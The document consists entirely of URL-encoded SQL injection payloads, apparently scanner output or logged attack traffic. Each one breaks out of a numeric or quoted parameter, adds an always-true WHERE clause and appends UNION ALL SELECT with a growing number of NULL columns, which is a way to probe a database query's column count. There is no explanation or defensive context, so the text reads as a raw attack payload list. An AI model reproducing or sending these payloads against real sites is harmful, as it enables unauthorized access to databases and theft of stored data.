1234.5%29%20WHERE%209355%3D9355%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%209266%3D9266%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%209252%3D9252%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%205218%3D5218%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%205851%3D5851%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%207766%3D7766%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%202919%3D2919%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%205124%3D5124%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%208188%3D8188%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%205075%3D5075%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%204809%3D4809%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%202786%3D2786%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%204143%3D4143%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%203178%3D3178%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%207033%3D7033%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%206961%3D6961%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%202686%3D2686%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%206243%3D6243%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%209158%3D9158%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%209047%3D9047%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%201510%3D1510%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%202473%3D2473%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%209785%3D9785%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%202548%3D2548%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%208261%3D8261%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%205872%3D5872%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%205209%3D5209%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%207919%3D7919%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%205195%3D5195%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%205533%3D5533%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%208892%3D8892%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%201343%3D1343%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%208866%3D8866%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%204705%3D4705%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%207741%3D7741%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%203635%3D3635%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%207361%3D7361%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 